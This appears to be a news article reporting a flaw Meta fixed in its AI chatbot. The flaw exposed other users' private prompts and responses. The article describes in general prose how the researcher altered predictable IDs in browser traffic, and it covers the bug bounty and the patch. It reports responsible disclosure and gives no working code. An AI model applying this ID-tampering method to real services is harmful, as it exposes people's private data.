Meta Patches Vulnerability That Could Lead to Data Leaks in User AI Prompts and Generated Content

2025-07-16

Meta has resolved a critical security flaw that previously allowed users of its AI chatbot to access private prompts and AI-generated responses belonging to other users.

Exclusive to TechCrunch, AppSecure founder Sandeep Hodkasia revealed the company received a $10,000 bug bounty from Meta for disclosing this vulnerability on December 26, 2024. The security researcher confirmed Meta implemented fixes by January 24, 2025, with no evidence of malicious exploitation detected.

Hodkasia discovered the vulnerability while examining Meta AI's prompt editing functionality. He found that editing prompts assigned unique identifiers to both prompts and AI responses. By manipulating network traffic in browsers, he demonstrated these IDs could be altered to retrieve data belonging to other users.

The security issue stemmed from inadequate user authorization checks on Meta's backend servers. Hodkasia noted the generated ID sequences were easily predictable, creating potential for attackers to automate ID manipulation and scrape private user data.

Meta spokesperson Ryan Daniels confirmed the January patch implementation to TechCrunch, reiterating "no exploitation evidence was found and researchers were appropriately rewarded."

This disclosure comes as major tech companies rapidly expand their AI offerings despite ongoing privacy and security challenges. The Meta AI standalone app - launched this year to compete with ChatGPT - initially faced issues when users inadvertently shared sensitive conversations with the chatbot.